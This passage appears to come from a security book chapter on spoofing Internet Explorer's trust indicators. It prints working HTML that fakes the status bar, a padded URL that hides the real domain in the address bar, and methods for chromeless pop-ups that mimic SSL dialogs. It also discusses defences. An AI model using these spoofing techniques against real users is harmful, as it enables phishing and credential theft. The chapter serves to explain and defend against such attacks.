Most of these techniques would port to the document models included in other browsers, but why bother when IE has taken over 90 percent of the Web? Variability is actually one of the major defenses against these attacks. The idea is that because we can so easily predict what the user is used to seeing, we have a straightforward way of faking out their expectations. Interestingly enough, the skin support of Windows XP is actually a very positive step towards defending against this style of attacks; if you can’t remotely query what skin a user is using, you can’t remotely spoof their “window dressing.”
On the flip side, Internet Explorer 6’s mysterious trait of “forget- ting” to keep the status bar active does tend to make the task of spoofing it moderately unnecessary (though an attacker still needs to guess whether or not to spoof something).
For once, the classic rejoinder is almost accurate: “It’s not a bug, it’s a feature.”
Notes from the Underground…
[root@fire x10]# cat webcache.html
<html>
<head>
<title>You think that's SSL you're parsing?</title>
</head>
<frameset rows="*,20" frameborder="0" framespacing="0" topmargin="0"
leftmargin="0" rightmargin="0" marginwidth="0" marginheight="0"
framespacing="0">
<frame src="encap.html">
<frame src="bottom.html" height=20 scrolling="no" frameborder="0"
marginwidth="0" marginheight="0" noresize="yes">
</frameset>
<body>
</body>
</html>
The height of the status bar is exactly 20 pixels, and there’s none of the stan- dard quirks of the frame attached, so we just disable all of them. Now, the con- tents of bottom.html will be rendered in the exact position of the original status bar. Let’s see what bottom.html looks like:
[root@fire x10]# cat bottom.html
<HTML>
<body bgcolor=#3267CD topmargin="0" leftmargin="0">
<TABLE CELLSPACING="0" CELLPADDING="0" VALIGN="bottom">
<TR ALIGN=center>
<TD><IMG hspace="0" vspace="0" ALIGN="left" SRC="left.gif"></TD>
<TD WIDTH=90%><IMG hspace="0" vspace="0" VALIGN="bottom" WIDTH=500 HEIGHT=20 SRC="midsmall.gif"></TD>
<TD><IMG hspace="0" vspace="0" ALIGN="right" SRC="right.gif"></TD>
</TR>
</TABLE>
</BODY>
</HTML>
If you think of a status bar, at least under Internet Explorer, here’s about what it’s composed of: A unique little page on the left, a mostly blank space in the
middle, and some fields on the right. So we copy the necessary patterns of pixels and spit it back out as needed. (The middle field is stretched a fixed amount—
there are methods in HTML to make the bar stretch left and right with the window itself, but they’re unneeded in this case.) By mimicking the surrounding environment, we spoof user expectations for who is providing the status bar—the user expects the system to be providing those pixels, but it’s just another part of the Web page.
A Whole New Kind of Buffer
Overflow: Risks of Right-Justification
This is just painfully bad.You may have noted an extraordinary amount of random variables in the URL that popup_ie.html calls.We’re not just going to do http://www.doxpara.com/x10/webcache.html, we’re going to do
http://www.doxpara.com/x10/webcache.html?site=https://www.x10.com/
hotnewsale/webaccessid=xyqx1412&netlocation=241&block=121&pid=81122&&sid=
1.The extra material is ignored by the browser and is merely sent to the Web server as ancillary information for its logs. No ancillary information is really needed—it’s a static Web page, for crying out loud—but the client doesn’t know that we have a much different purpose for it. Because for each character you toss on past what the window can contain, the text field containing the address loses characters on the left side. Because we set the size of the address bar indirectly when we specified a window size in popup_ie.html, and because the font used for the address bar is virtually fixed (except on strange browsers that can be filtered out by their uniformly polluted outgoing HTTP headers), it’s a reasonably straightforward matter of trial and error to specify the exact number and style of character to delete the actual source of the Web page—in this case:
http://www.doxpara.com/x10?.We just put on enough garbage variables and—
poof—it just looks like yet another page with too many variables exposed to the outside world.
Individually, each of these problems is just a small contributor. But when combined, they’re deadly. Figure 12.2 illustrates what the user sees; Figure 12.3 illustrates what’s really happening.
Total Control: Spoofing Entire Windows
One of the interesting security features built into early, non–MS Java Virtual Machines was a specification that all untrusted windows had to have a status bar notifying the user that a given dialog box was actually being run by a remote server and wasn’t in fact reflecting the local system.
The lack of this security feature was one of the more noticeable omissions for Microsoft Java environments.
Some systems remain configured to display a quick notification dialog box when transitioning to a secure site.This notification looks something like Figure 12.4.
Unfortunately, this is just another array of pixels, and using the “chromeless pop-up” features of Internet Explorer, such pixels can be spoofed with ease, such as the pop-up ad shown in Figure 12.5.
Figure 12.3The Faked Pop-Up Ad Revealed
Figure 12.4Explicit SSL Notification Dialog Box
That’s not an actual window, and small signs give it away—the antialiased text in the title bar, for example. But it’s enough.This version is merely a graphic, but HTML, Java, and especially Flash are rich enough tools to spoof an entire GUI—
or at least one window at a time.You trust pixels; the Web gives pixels. In this case, you expect extra pixels to differentiate the Web’s content from your system’s;
by bug or design there are methods of removing your system’s pixels leaving the Web to do what it will. (In this case, all that was needed was to set two options against each other: First, the fullscreen=1 variable was set in the popup function, increasing the size of the window and removing the borders. But then a second, contradictory set of options was added—resizable=0, and an explicitly enumerated height and width. So the resizing of fullscreen mode got cancelled, but the bor- ders were already stripped—by bug or design, the result was chromeless windows all ready for fake chrome to be slathered on.)
Attacking SSL through Intermittent Failures
Occasionally, we end up overthinking a problem—yes, it’s possible to trick a user into thinking they’re in a secure site. But you don’t always need to work so hard.
What if, 1 out of every 1,000 times somebody tried to log in to his bank or stockbroker through their Web page, the login screen was not routed through SSL?
Would there be an error? In a sense.The address bar would definitely be missing the s in https, and the 16ì16 pixel lock would be gone. But that’s it, just that once; a single reload would redirect back to https.
Would anybody ever catch this error?
Figure 12.5Arbitrary Web-Supplied Notification Dialog Box
Might somebody call up tech support and complain, and be told anything other than “reload the page and see if the problem goes away?”
The problem stems from the fact that not all traffic is able to be either encrypted or authenticated.There’s no way for a page itself to securely load, saying “If I’m not encrypted, scream to the user not to give me his secret infor- mation.” (Even if there was, the fact that the page was unauthenticated would mean an attacker could easily strip this flag off.) The user’s willingness to read unencrypted and unauthenticated traffic means that anyone who’s able to capture his connection and spoof content from his bank or brokerage would be able to prevent the page delivered from mentioning its insecure status anyway.
NOTE
The best solution will probably end up involving the adding of a lock under and/or to the right of the mouse pointer whenever navigating a secure page. It’s small enough to be moderately unobtrusive, doesn’t interrupt the data flow, communicates important information, and (most importantly) is directly in the field of view at the moment a secured link receives information from the browser. Of course, we’d have to worry about things like Comet Cursor allowing even the mouse cursor to be spoofed…so the arms race would continue.
In Pixels We Trust:The Honest Truth
“Veblen proposed that the psychology of prestige was driven by three “pecuniary canons of taste”: conspicuous leisure, conspicuous consumption, and conspicuous waste. Status symbols are flaunted and coveted not necessarily because they are useful or attractive (pebbles, daisies, and pigeons are quite beautiful, as we rediscover when they delight young children), but often because they are so rare, wasteful, or pointless that only the wealthy can afford them.
They include clothing that is too delicate, bulky, constricting, or stain-prone to work in, objects too fragile for casual use or made from unobtainable materials, functionless objects made with prodi- gious labor, decorations that consume energy, and pale skin in lands where the plebeians work the fields and suntans in lands where they work indoors. The logic is: You can’t see all my wealth and earning power (my bank account, my lands, all my allies and
flunkeys), but you can see my gold bathroom fixtures. No one could afford them without wealth to spare, therefore you know I am wealthy.”
—Steven Pinker, “How The Mind Works”
Let’s be honest: It isn’t the tiny locks and the little characters in the right places we trust.There are sites that appear professional, and there are sites that look like they were made by a 13-year old with a pirated copy of Photoshop and a very special problem with Ritalin. Complaining about the presumptions that people might come to based on appearances only does tend to ignore the semicryptographic validity in those presumptions—there’s a undeniable asym- metry to elegance and class. It’s much easier to recognize than it is to generate.
But the analogy to the real world does break down: Although it is indeed difficult to create an elegant site, especially one with a significant amount of backend dynamic programming evident (yes, that’s why dynamic content impresses), it’s trivial to copy any limited amount of functionality and appearances.We don’t actually trust the pixels along the borders telling us whether a site is secure or not.We’re really looking at the design itself—even though just about anyone can rip off any design he or she likes and slap it onto any domain he gets access to.
(Of course, the access to domains is an issue—note the wars for domain names.)
Down and Dirty: Engineering